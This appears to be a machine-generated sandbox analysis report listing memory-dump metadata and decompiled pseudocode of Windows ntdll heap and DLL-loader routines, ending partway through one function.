                                                                            0x1d87fe28
                                                                            0x1d87fe2e
                                                                            0x1d8802d1
                                                                            0x1d8802d4
                                                                            0x1d8802e0
                                                                            0x1d8802e0

                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
                                                                            • API String ID: 3446177414-1700792311
                                                                            • Opcode ID: 5ef034228975d8ea0595724200e37fd13ebc3564f2000d6213a23cd7c42cdbfd
                                                                            • Instruction ID: 18284fde303990b6af297de53343ca3c1c0642c081b79b51db01eda24d3386f5
                                                                            • Opcode Fuzzy Hash: 5ef034228975d8ea0595724200e37fd13ebc3564f2000d6213a23cd7c42cdbfd
                                                                            • Instruction Fuzzy Hash: DBD1CF3590469ADFCB02CFA8C844ABDBBF6FF49720F058059F5459B263C735A942DB12
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 67%
                                                                            			E1D87F8F8(void* __ebx, intOrPtr __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
                                                                            				signed int _t73;
                                                                            				signed int _t75;
                                                                            				signed int _t79;
                                                                            				intOrPtr _t81;
                                                                            				signed int _t82;
                                                                            				signed char _t86;
                                                                            				signed int _t87;
                                                                            				intOrPtr _t89;
                                                                            				intOrPtr _t93;
                                                                            				intOrPtr _t103;
                                                                            				signed int _t120;
                                                                            				signed char _t131;
                                                                            				intOrPtr _t133;
                                                                            				signed int _t136;
                                                                            				signed int _t151;
                                                                            				signed int* _t154;
                                                                            				signed int _t158;
                                                                            				signed int* _t160;
                                                                            				intOrPtr* _t164;
                                                                            				void* _t165;
                                                                            
                                                                            				_push(0x34);
                                                                            				_push(0x1d8ad2f8);
                                                                            				E1D827BE4(__ebx, __edi, __esi);
                                                                            				 *(_t165 - 0x34) = __edx;
                                                                            				_t162 = __ecx;
                                                                            				 *((intOrPtr*)(_t165 - 0x30)) = __ecx;
                                                                            				_t158 = 0;
                                                                            				 *(_t165 - 0x28) = 0;
                                                                            				 *((char*)(_t165 - 0x19)) = 0;
                                                                            				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
                                                                            					 *((intOrPtr*)(_t165 - 4)) = 0;
                                                                            					 *((intOrPtr*)(_t165 - 4)) = 1;
                                                                            					_t73 = E1D7C7662("RtlFreeHeap");
                                                                            					__eflags = _t73;
                                                                            					if(_t73 == 0) {
                                                                            						_t158 = 0;
                                                                            						 *(_t165 - 0x28) = 0;
                                                                            						L34:
                                                                            						 *((intOrPtr*)(_t165 - 4)) = 0;
                                                                            						 *((intOrPtr*)(_t165 - 4)) = 0xfffffffe;
                                                                            						E1D87FBB7();
                                                                            						_t75 = _t158;
                                                                            						goto L35;
                                                                            					}
                                                                            					_t131 =  *(__ecx + 0x44) |  *(_t165 - 0x34);
                                                                            					 *(_t165 - 0x2c) = _t131;
                                                                            					 *(_t165 - 0x34) = _t131 | 0x10000000;
                                                                            					__eflags = _t131 & 0x00000001;
                                                                            					if((_t131 & 0x00000001) == 0) {
                                                                            						E1D7DFED0( *((intOrPtr*)(__ecx + 0xc8)));
                                                                            						 *((char*)(_t165 - 0x19)) = 1;
                                                                            						_t120 =  *(_t165 - 0x2c) | 0x10000001;
                                                                            						__eflags = _t120;
                                                                            						 *(_t165 - 0x34) = _t120;
                                                                            					}
                                                                            					E1D880835(_t162, 0);
                                                                            					_t151 =  *((intOrPtr*)(_t165 + 8)) + 0xfffffff8;
                                                                            					__eflags =  *((char*)(_t151 + 7)) - 5;
                                                                            					if( *((char*)(_t151 + 7)) == 5) {
                                                                            						_t151 = _t151 - (( *(_t151 + 6) & 0x000000ff) << 3);
                                                                            						__eflags = _t151;
                                                                            					}
                                                                            					 *(_t165 - 0x24) = _t151;
                                                                            					 *(_t165 - 0x2c) = _t151;
                                                                            					_t133 = _t162;
                                                                            					_t79 = E1D7C753F(_t133, _t151, "RtlFreeHeap");
                                                                            					__eflags = _t79;
                                                                            					if(_t79 == 0) {
                                                                            						goto L34;
                                                                            					} else {
                                                                            						__eflags =  *((intOrPtr*)(_t165 + 8)) -  *0x1d8c47d0; // 0x0
                                                                            						_t81 =  *[fs:0x30];
                                                                            						if(__eflags != 0) {
                                                                            							_t82 =  *(_t81 + 0x68);
                                                                            							 *(_t165 - 0x3c) = _t82;
                                                                            							__eflags = _t82 & 0x00000800;
                                                                            							if((_t82 & 0x00000800) == 0) {
                                                                            								L32:
                                                                            								_t158 = E1D7E3BC0(_t162,  *(_t165 - 0x34),  *((intOrPtr*)(_t165 + 8)));
                                                                            								 *(_t165 - 0x28) = _t158;
                                                                            								E1D880D24( *((intOrPtr*)(_t165 - 0x30)));
                                                                            								E1D880835( *((intOrPtr*)(_t165 - 0x30)), 0);
                                                                            								goto L34;
                                                                            							}
                                                                            							__eflags =  *0x1d8c47d4;
                                                                            							if( *0x1d8c47d4 == 0) {
                                                                            								goto L32;
                                                                            							}
                                                                            							_t160 =  *(_t165 - 0x2c);
                                                                            							_t154 =  *(_t165 - 0x24);
                                                                            							__eflags =  *(_t162 + 0x4c);
                                                                            							if( *(_t162 + 0x4c) != 0) {
                                                                            								 *_t160 =  *_t160 ^  *(_t162 + 0x50);
                                                                            								_t38 =  &(_t154[0]); // 0xffff
                                                                            								_t39 =  &(_t154[0]); // 0xffffff
                                                                            								__eflags = _t160[0] - ( *_t38 ^  *_t39 ^  *_t154);
                                                                            								if(__eflags != 0) {
                                                                            									_push(_t133);
                                                                            									E1D88D646(0, _t162, _t160, _t160, _t162, __eflags);
                                                                            									_t154 =  *(_t165 - 0x24);
                                                                            								}
                                                                            							}
                                                                            							__eflags = _t160[0] & 0x00000002;
                                                                            							if((_t160[0] & 0x00000002) == 0) {
                                                                            								_t86 = _t160[0];
                                                                            								 *(_t165 - 0x1a) = _t86;
                                                                            								_t87 = _t86 & 0x000000ff;
                                                                            							} else {
                                                                            								_t103 = E1D803AE9(_t160);
                                                                            								 *((intOrPtr*)(_t165 - 0x40)) = _t103;
                                                                            								_t87 =  *(_t103 + 2) & 0x0000ffff;
                                                                            							}
                                                                            							_t136 = _t87;
                                                                            							 *(_t165 - 0x20) = _t87;
                                                                            							__eflags =  *(_t162 + 0x4c);
                                                                            							if( *(_t162 + 0x4c) != 0) {
                                                                            								_t51 =  &(_t154[0]); // 0xffff
                                                                            								_t52 =  &(_t154[0]); // 0xffffff
                                                                            								_t160[0] =  *_t51 ^  *_t52 ^  *_t154;
                                                                            								 *_t160 =  *_t160 ^  *(_t162 + 0x50);
                                                                            								__eflags =  *_t160;
                                                                            							}
                                                                            							__eflags = _t136;
                                                                            							if(_t136 != 0) {
                                                                            								__eflags = _t136 -  *0x1d8c47d4; // 0x0
                                                                            								if(__eflags != 0) {
                                                                            									goto L32;
                                                                            								}
                                                                            								__eflags =  *((intOrPtr*)(_t162 + 0x7c)) -  *0x1d8c47d6; // 0x0
                                                                            								if(__eflags != 0) {
                                                                            									goto L32;
                                                                            								}
                                                                            								_t89 =  *[fs:0x30];
                                                                            								__eflags =  *(_t89 + 0xc);
                                                                            								if( *(_t89 + 0xc) == 0) {
                                                                            									_push("HEAP: ");
                                                                            									E1D7CB910();
                                                                            								} else {
                                                                            									E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            								}
                                                                            								_push(E1D87823A(_t162,  *(_t165 - 0x20)));
                                                                            								E1D7CB910("About to free block at %p with tag %ws\n",  *((intOrPtr*)(_t165 + 8)));
                                                                            								L30:
                                                                            								_t93 =  *[fs:0x30];
                                                                            								__eflags =  *((char*)(_t93 + 2));
                                                                            								if( *((char*)(_t93 + 2)) != 0) {
                                                                            									 *0x1d8c47a1 = 1;
                                                                            									 *0x1d8c4100 = 0;
                                                                            									asm("int3");
                                                                            									 *0x1d8c47a1 = 0;
                                                                            								}
                                                                            							}
                                                                            							goto L32;
                                                                            						}
                                                                            						__eflags =  *(_t81 + 0xc);
                                                                            						if( *(_t81 + 0xc) == 0) {
                                                                            							_push("HEAP: ");
                                                                            							E1D7CB910();
                                                                            						} else {
                                                                            							E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            						}
                                                                            						E1D7CB910("About to free block at %p\n",  *0x1d8c47d0);
                                                                            						goto L30;
                                                                            					}
                                                                            				} else {
                                                                            					_t164 =  *0x1d8c3750; // 0x0
                                                                            					 *0x1d8c91e0(__ecx, __edx,  *((intOrPtr*)(_t165 + 8)));
                                                                            					_t75 =  *_t164() & 0x000000ff;
                                                                            					L35:
                                                                            					 *[fs:0x0] =  *((intOrPtr*)(_t165 - 0x10));
                                                                            					return _t75;
                                                                            				}
                                                                            			}

                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: About to free block at %p$About to free block at %p with tag %ws$HEAP: $HEAP[%wZ]: $RtlFreeHeap
                                                                            • API String ID: 3446177414-3492000579
                                                                            • Opcode ID: 9a204a27c0e98bf1062e611d128a2836a376353335bab54cced8f8b8046198ff
                                                                            • Instruction ID: 2ea4f947d3c9d19651b0ff1478d78a22a57e4c44cd8c203776693d2e2d913697
                                                                            • Opcode Fuzzy Hash: 9a204a27c0e98bf1062e611d128a2836a376353335bab54cced8f8b8046198ff
                                                                            • Instruction Fuzzy Hash: C571EE36904689DFCB01CF69D4906FDFBF2FF89314F06805AE5459B262CB35A980DB52
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 41%
                                                                            			E1D804C3D(void* __ecx) {
                                                                            				char _v8;
                                                                            				intOrPtr* _t24;
                                                                            				intOrPtr _t27;
                                                                            				intOrPtr _t36;
                                                                            				void* _t39;
                                                                            				intOrPtr _t40;
                                                                            				void* _t42;
                                                                            				void* _t45;
                                                                            				void* _t47;
                                                                            				intOrPtr* _t48;
                                                                            				void* _t49;
                                                                            				intOrPtr _t51;
                                                                            
                                                                            				_push(__ecx);
                                                                            				_t45 = 0;
                                                                            				_t42 = __ecx;
                                                                            				_t51 =  *0x1d8c65e4; // 0x76f9f0e0
                                                                            				if(_t51 == 0) {
                                                                            					L10:
                                                                            					return _t45;
                                                                            				}
                                                                            				_t40 =  *((intOrPtr*)(__ecx + 0x18));
                                                                            				_t36 =  *0x1d8c5b24; // 0x1932c18
                                                                            				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t36) {
                                                                            					_t24 =  *((intOrPtr*)(_t42 + 0x28));
                                                                            					if(_t42 == _t36) {
                                                                            						_t47 = 0x5c;
                                                                            						if( *_t24 == _t47) {
                                                                            							_t39 = 0x3f;
                                                                            							if( *((intOrPtr*)(_t24 + 2)) == _t39 &&  *((intOrPtr*)(_t24 + 4)) == _t39 &&  *((intOrPtr*)(_t24 + 6)) == _t47 &&  *((intOrPtr*)(_t24 + 8)) != 0 &&  *((short*)(_t24 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t24 + 0xc)) == _t47) {
                                                                            								_t24 = _t24 + 8;
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            					_t48 =  *0x1d8c65e4; // 0x76f9f0e0
                                                                            					 *0x1d8c91e0(_t40, _t24,  &_v8);
                                                                            					_t45 =  *_t48();
                                                                            					if(_t45 >= 0) {
                                                                            						L8:
                                                                            						_t27 = _v8;
                                                                            						if(_t27 != 0) {
                                                                            							if( *((intOrPtr*)(_t42 + 0x48)) != 0) {
                                                                            								E1D7D26A0(_t27,  *((intOrPtr*)(_t42 + 0x48)));
                                                                            								_t27 = _v8;
                                                                            							}
                                                                            							 *((intOrPtr*)(_t42 + 0x48)) = _t27;
                                                                            						}
                                                                            						if(_t45 < 0) {
                                                                            							if(( *0x1d8c37c0 & 0x00000003) != 0) {
                                                                            								E1D84E692("minkernel\\ntdll\\ldrsnap.c", 0x2eb, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t45);
                                                                            							}
                                                                            							if(( *0x1d8c37c0 & 0x00000010) != 0) {
                                                                            								asm("int3");
                                                                            							}
                                                                            						}
                                                                            						goto L10;
                                                                            					}
                                                                            					if(_t45 != 0xc000008a) {
                                                                            						if(_t45 != 0xc000008b && _t45 != 0xc0000089 && _t45 != 0xc000000f && _t45 != 0xc0000204 && _t45 != 0xc0000002) {
                                                                            							if(_t45 != 0xc00000bb) {
                                                                            								goto L8;
                                                                            							}
                                                                            						}
                                                                            					}
                                                                            					if(( *0x1d8c37c0 & 0x00000005) != 0) {
                                                                            						_push(_t45);
                                                                            						_t18 = _t42 + 0x24; // 0x123
                                                                            						E1D84E692("minkernel\\ntdll\\ldrsnap.c", 0x2ce, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t18);
                                                                            						_t49 = _t49 + 0x1c;
                                                                            					}
                                                                            					_t45 = 0;
                                                                            					goto L8;
                                                                            				} else {
                                                                            					goto L10;
                                                                            				}
                                                                            			}
















                                                                            APIs
                                                                            Strings
                                                                            • LdrpFindDllActivationContext, xrefs: 1D843440, 1D84346C
                                                                            • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 1D843439
                                                                            • minkernel\ntdll\ldrsnap.c, xrefs: 1D84344A, 1D843476
                                                                            • Querying the active activation context failed with status 0x%08lx, xrefs: 1D843466
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.210670854299.000000001D7A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D7A0000, based on PE: true
                                                                            • Associated: 00000004.00000002.210672228455.000000001D8C9000.00000040.00000800.00020000.00000000.sdmp
                                                                            • Associated: 00000004.00000002.210672290922.000000001D8CD000.00000040.00000800.00020000.00000000.sdmp
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_4_2_1d7a0000_SecuriteInfo.jbxd
                                                                            Similarity
                                                                            • API ID: DebugPrintTimes
                                                                            • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                                            • API String ID: 3446177414-3779518884
                                                                            • Opcode ID: aedda66c305fa6dc367a709d4b63b1c9e949bb566a1cf70e6cd78fa12346aa52
                                                                            • Instruction ID: c22e42f4773ffcf0cd65b58363e3d6574462fbd4885be2a5bfed54ea71d3a84e
                                                                            • Opcode Fuzzy Hash: aedda66c305fa6dc367a709d4b63b1c9e949bb566a1cf70e6cd78fa12346aa52
                                                                            • Instruction Fuzzy Hash: 6131C472EC0696FFDB129B0C8C89BB9B3A4BB45768F16C12AF90457151D770AD80C2D3
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            C-Code - Quality: 75%
                                                                            			E1D7E0680(intOrPtr __ecx, signed int* __edx) {
                                                                            				signed int* _v8;
                                                                            				intOrPtr _v12;
                                                                            				intOrPtr _v16;
                                                                            				char _v20;
                                                                            				intOrPtr* _v24;
                                                                            				signed int _v28;
                                                                            				signed int _v32;
                                                                            				signed char _v56;
                                                                            				char _v60;
                                                                            				void* __ebx;
                                                                            				void* __edi;
                                                                            				void* __esi;
                                                                            				void* __ebp;
                                                                            				signed char _t136;
                                                                            				signed int _t141;
                                                                            				void* _t143;
                                                                            				signed int* _t145;
                                                                            				signed int* _t146;
                                                                            				intOrPtr _t148;
                                                                            				unsigned int _t150;
                                                                            				char _t162;
                                                                            				signed int* _t164;
                                                                            				signed char* _t165;
                                                                            				intOrPtr _t166;
                                                                            				signed int* _t168;
                                                                            				signed char* _t169;
                                                                            				signed char* _t171;
                                                                            				signed char* _t180;
                                                                            				intOrPtr _t195;
                                                                            				signed int _t197;
                                                                            				signed int _t209;
                                                                            				signed char _t210;
                                                                            				intOrPtr* _t215;
                                                                            				intOrPtr _t222;
                                                                            				signed int _t232;
                                                                            				intOrPtr* _t242;
                                                                            				intOrPtr _t244;
                                                                            				unsigned int _t245;
                                                                            				intOrPtr _t247;
                                                                            				intOrPtr* _t258;
                                                                            				signed char _t264;
                                                                            				unsigned int _t269;
                                                                            				intOrPtr _t271;
                                                                            				signed int* _t276;
                                                                            				signed int _t277;
                                                                            				void* _t278;
                                                                            				intOrPtr _t281;
                                                                            				signed int* _t287;
                                                                            				intOrPtr _t288;
                                                                            				unsigned int _t291;
                                                                            				unsigned int* _t295;
                                                                            				intOrPtr* _t298;
                                                                            				intOrPtr _t300;
                                                                            
                                                                            				_t231 = __edx;
                                                                            				_v8 = __edx;
                                                                            				_t300 = __ecx;
                                                                            				_t298 = E1D7E0ACE(__edx,  *__edx);
                                                                            				if(_t298 == __ecx + 0x8c) {
                                                                            					L45:
                                                                            					return 0;
                                                                            				}
                                                                            				if( *0x1d8c6960 >= 1) {
                                                                            					__eflags =  *(_t298 + 0x14) -  *__edx;
                                                                            					if(__eflags < 0) {
                                                                            						_t222 =  *[fs:0x30];
                                                                            						__eflags =  *(_t222 + 0xc);
                                                                            						if( *(_t222 + 0xc) == 0) {
                                                                            							_push("HEAP: ");
                                                                            							E1D7CB910();
                                                                            						} else {
                                                                            							E1D7CB910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
                                                                            						}
                                                                            						_push("(UCRBlock->Size >= *Size)");
                                                                            						E1D7CB910();
                                                                            						__eflags =  *0x1d8c5da8;
                                                                            						if(__eflags == 0) {
                                                                            							E1D88FC95(_t231, 1, _t298, __eflags);
                                                                            						}
                                                                            					}
                                                                            				}
                                                                            				_t136 =  *((intOrPtr*)(_t298 - 2));
                                                                            				_t4 = _t298 - 8; // -8
                                                                            				_t232 = _t4;
                                                                            				if(_t136 != 0) {
                                                                            					_v12 = (_t232 & 0xffff0000) - ((_t136 & 0x000000ff) << 0x10) + 0x10000;
                                                                            				} else {
                                                                            					_v12 = _t300;
                                                                            				}
                                                                            				_v20 =  *((intOrPtr*)(_t298 + 0x10));
                                                                            				_t141 =  *(_t300 + 0xcc) ^  *0x1d8c6d48;
                                                                            				_v28 = _t141;
                                                                            				if(_t141 != 0) {
                                                                            					 *0x1d8c91e0(_t300,  &_v20, _v8);
                                                                            					_t143 = _v28();
                                                                            					_t276 = _v8;
                                                                            					goto L13;
                                                                            				} else {
                                                                            					_t295 = _v8;
                                                                            					if( *(_t298 + 0x14) -  *_t295 <=  *(_t300 + 0x6c) << 3) {
                                                                            						_t269 =  *(_t298 + 0x14);
                                                                            						__eflags = _t269 -  *(_t300 + 0x5c) << 3;
                                                                            						if(__eflags < 0) {
                                                                            							 *_t295 = _t269;
                                                                            						}
                                                                            					}
                                                                            					if(( *(_t300 + 0x40) & 0x00040000) != 0) {
                                                                            						_push(0);
                                                                            						_push(0x1c);
                                                                            						_v16 = 0x40;
                                                                            						_push( &_v60);
                                                                            						_push(3);
                                                                            						_push(_t300);
                                                                            						_push(0xffffffff);
                                                                            						_t209 = E1D812BE0();
                                                                            						__eflags = _t209;
                                                                            						_t210 = _v56;
                                                                            						if(_t209 < 0) {
                                                                            							L61:
                                                                            							__eflags = 0;
                                                                            							E1D895FED(0, _t300, 1, _t210, 0, 0);
                                                                            							_v16 = 4;
                                                                            							L62:
                                                                            							_t276 = _v8;
                                                                            							goto L8;
                                                                            						}
                                                                            						__eflags = _t210 & 0x00000060;
                                                                            						if((_t210 & 0x00000060) == 0) {
                                                                            							goto L61;
                                                                            						}
                                                                            						__eflags = _v60 - _t300;
                                                                            						if(__eflags == 0) {
                                                                            							goto L62;
                                                                            						}
                                                                            						goto L61;
                                                                            					} else {
                                                                            						_v16 = 4;
                                                                            						L8:
                                                                            						_v32 =  *_t276;
                                                                            						_v28 =  *((intOrPtr*)(_t300 + 0x1f8)) -  *((intOrPtr*)(_t300 + 0x244));
                                                                            						_t215 = _t300 + 0xd4;
                                                                            						_v24 = _t215;
                                                                            						if( *0x1d8c373c != 0) {
                                                                            							L11:
                                                                            							_push(_v16);
                                                                            							_push(0x1000);
                                                                            							_push(_t276);
                                                                            							_push(0);
                                                                            							_push( &_v20);
                                                                            							_push(0xffffffff);
                                                                            							_t143 = E1D812B10();
                                                                            							_t276 = _v8;
                                                                            							L12:
                                                                            							 *((intOrPtr*)(_t300 + 0x21c)) =  *((intOrPtr*)(_t300 + 0x21c)) + 1;
                                                                            							L13:
                                                                            							if(_t143 < 0) {
                                                                            								 *((intOrPtr*)(_t300 + 0x224)) =  *((intOrPtr*)(_t300 + 0x224)) + 1;
                                                                            								goto L45;
                                                                            							}
                                                                            							_t145 =  *( *[fs:0x30] + 0x50);
                                                                            							if(_t145 != 0) {
                                                                            								__eflags =  *_t145;
                                                                            								if(__eflags == 0) {
                                                                            									goto L15;
                                                                            								}
                                                                            								_t146 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                                                                            								L16:
                                                                            								if( *_t146 != 0) {
                                                                            									__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
                                                                            									if(__eflags != 0) {
                                                                            										E1D88EFD3(_t232, _t300, _v20,  *_t276, 2);
                                                                            									}
                                                                            								}
                                                                            								if( *((intOrPtr*)(_t300 + 0x4c)) != 0) {
                                                                            									_t291 =  *(_t300 + 0x50) ^  *_t232;
                                                                            									 *_t232 = _t291;
                                                                            									_t264 = _t291 >> 0x00000010 ^ _t291 >> 0x00000008 ^ _t291;
                                                                            									if(_t291 >> 0x18 != _t264) {
                                                                            										_push(_t264);
                                                                            										E1D88D646(_t232, _t300, _t232, _t298, _t300, __eflags);
                                                                            									}
                                                                            								}
                                                                            								 *((char*)(_t232 + 2)) = 0;
                                                                            								 *((char*)(_t232 + 7)) = 0;
                                                                            								_t148 =  *((intOrPtr*)(_t298 + 8));
                                                                            								_t242 =  *((intOrPtr*)(_t298 + 0xc));
                                                                            								_t277 =  *((intOrPtr*)(_t148 + 4));
                                                                            								_v32 = _t277;
                                                                            								_t38 = _t298 + 8; // 0x8
                                                                            								_t278 = _t38;
                                                                            								if( *_t242 != _t277 ||  *_t242 != _t278) {
                                                                            									E1D895FED(0xd, 0, _t278, _v32,  *_t242, 0);
                                                                            								} else {
                                                                            									 *_t242 = _t148;
                                                                            									 *((intOrPtr*)(_t148 + 4)) = _t242;
                                                                            								}
                                                                            								_t150 =  *(_t298 + 0x14);
                                                                            								if(_t150 == 0) {
                                                                            									L27:
                                                                            									_t244 = _v12;
                                                                            									 *((intOrPtr*)(_t244 + 0x30)) =  *((intOrPtr*)(_t244 + 0x30)) - 1;
                                                                            									 *((intOrPtr*)(_t244 + 0x2c)) =  *((intOrPtr*)(_t244 + 0x2c)) - ( *(_t298 + 0x14) >> 0xc);
                                                                            									 *((intOrPtr*)(_t300 + 0x1f8)) =  *((intOrPtr*)(_t300 + 0x1f8)) +  *(_t298 + 0x14);
                                                                            									 *((intOrPtr*)(_t300 + 0x20c)) =  *((intOrPtr*)(_t300 + 0x20c)) + 1;
                                                                            									 *((intOrPtr*)(_t300 + 0x208)) =  *((intOrPtr*)(_t300 + 0x208)) - 1;
                                                                            									_t245 =  *(_t298 + 0x14);
                                                                            									if(_t245 >= 0x7f000) {
                                                                            										 *((intOrPtr*)(_t300 + 0x1fc)) =  *((intOrPtr*)(_t300 + 0x1fc)) - _t245;
                                                                            										_t245 =  *(_t298 + 0x14);
                                                                            									}
                                                                            									_t280 = _v8;
                                                                            									_t154 =  *_v8;
                                                                            									if(_t245 <=  *_v8) {
                                                                            										_t281 = _v12;
                                                                            										__eflags =  *((intOrPtr*)(_t298 + 0x10)) + _t245 -  *((intOrPtr*)(_t281 + 0x28));
                                                                            										_t280 = _v8;
                                                                            										if( *((intOrPtr*)(_t298 + 0x10)) + _t245 !=  *((intOrPtr*)(_t281 + 0x28))) {
                                                                            											 *_t280 =  *_t280 + ( *_t232 & 0x0000ffff) * 8;
                                                                            											goto L30;
                                                                            										}
                                                                            										_t154 =  *_t280;
                                                                            										goto L29;
                                                                            									} else {
                                                                            										L29:
                                                                            										E1D7E096B(_t300, _v12,  *((intOrPtr*)(_t298 + 0x10)) + 0xffffffe8 +  *_t280, _t245 - _t154, _t232, _t280);
                                                                            										 *_v8 =  *_v8 << 3;
                                                                            										L30:
                                                                            										_t247 = _v12;
                                                                            										 *((char*)(_t232 + 3)) = 0;
                                                                            										_t282 =  *((intOrPtr*)(_t247 + 0x18));
                                                                            										if( *((intOrPtr*)(_t247 + 0x18)) != _t247) {
                                                                            											_t162 = (_t232 - _t247 >> 0x10) + 1;
                                                                            											_v32 = _t162;
                                                                            											__eflags = _t162 - 0xfe;
                                                                            											if(_t162 >= 0xfe) {
                                                                            												E1D895FED(3, _t282, _t232, _t247, 0, 0);
                                                                            												_t162 = _v32;
                                                                            											}
                                                                            										} else {
                                                                            											_t162 = 0;
                                                                            										}
                                                                            										 *((char*)(_t232 + 6)) = _t162;
                                                                            										_t164 =  *( *[fs:0x30] + 0x50);
                                                                            										if(_t164 != 0) {
                                                                            											__eflags =  *_t164;
                                                                            											if( *_t164 == 0) {
                                                                            												goto L33;
                                                                            											}
                                                                            											_t165 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                                                                            											L34:
                                                                            											if( *_t165 != 0) {
                                                                            												_t166 =  *[fs:0x30];
                                                                            												__eflags =  *(_t166 + 0x240) & 0x00000001;
                                                                            												if(( *(_t166 + 0x240) & 0x00000001) == 0) {
                                                                            													goto L35;
                                                                            												}
                                                                            												__eflags = E1D7E3C40();
                                                                            												if(__eflags == 0) {
                                                                            													_t180 = 0x7ffe0380;
                                                                            												} else {
                                                                            													_t180 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
                                                                            												}
                                                                            												_t299 = _v8;
                                                                            												E1D88F1C3(_t232, _t300, _t232, __eflags,  *_v8,  *(_t300 + 0x74) << 3,  *_t180 & 0x000000ff);
                                                                            												L36:
                                                                            												_t168 =  *( *[fs:0x30] + 0x50);
                                                                            												if(_t168 != 0) {
                                                                            													__eflags =  *_t168;
                                                                            													if( *_t168 == 0) {
                                                                            														goto L37;
                                                                            													}
                                                                            													_t169 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
                                                                            													L38:
                                                                            													if( *_t169 != 0) {
                                                                            														__eflags = E1D7E3C40();
                                                                            														if(__eflags == 0) {
                                                                            															_t171 = 0x7ffe038a;
                                                                            														} else {
                                                                            															_t171 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
                                                                            														}
                                                                            														E1D88F1C3(_t232, _t300, _t232, __eflags,  *_t299,  *(_t300 + 0x74) << 3,  *_t171 & 0x000000ff);
                                                                            													}
                                                                            													return _t232;
                                                                            												}
                                                                            												L37:
                                                                            												_t169 = 0x7ffe038a;
                                                                            												goto L38;
                                                                            											}
                                                                            											L35:
                                                                            											_t299 = _v8;
                                                                            											goto L36;
                                                                            										}
                                                                            										L33:
                                                                            										_t165 = 0x7ffe0380;
                                                                            										goto L34;
                                                                            									}
                                                                            								} else {
                                                                            									_t287 =  *(_t300 + 0xb8);
                                                                            									if(_t287 != 0) {
                                                                            										_t256 = _t150 >> 0xc;
                                                                            										__eflags = _t256 - _t287[1];
                                                                            										if(_t256 < _t287[1]) {
                                                                            											L79:
                                                                            											E1D7E036A(_t300, _t287, 0, _t298, _t256, _t150);
                                                                            											goto L24;
                                                                            										} else {
                                                                            											goto L75;
                                                                            										}
                                                                            										while(1) {
                                                                            											L75:
                                                                            											_t197 =  *_t287;
                                                                            											__eflags = _t197;
                                                                            											_v32 = _t197;
                                                                            											_t150 =  *(_t298 + 0x14);
                                                                            											if(_t197 == 0) {
                                                                            												break;
                                                                            											}
                                                                            											_t287 = _v32;
                                                                            											__eflags = _t256 - _t287[1];
                                                                            											if(_t256 >= _t287[1]) {
                                                                            												continue;
                                                                            											}
                                                                            											goto L79;
                                                                            										}
                                                                            										_t256 = _t287[1] - 1;
                                                                            										__eflags = _t287[1] - 1;
                                                                            										goto L79;
                                                                            									}
                                                                            									L24:
                                                                            									_t258 =  *((intOrPtr*)(_t298 + 4));
                                                                            									_t195 =  *_t298;
                                                                            									_t288 =  *_t258;
                                                                            									if(_t288 !=  *((intOrPtr*)(_t195 + 4)) || _t288 != _t298) {
                                                                            										E1D895FED(0xd, 0, _t298,  *((intOrPtr*)(_t195 + 4)), _t288, 0);
                                                                            									} else {
                                                                            										 *_t258 = _t195;
                                                                            										 *((intOrPtr*)(_t195 + 4)) = _t258;
                                                                            									}
                                                                            									goto L27;
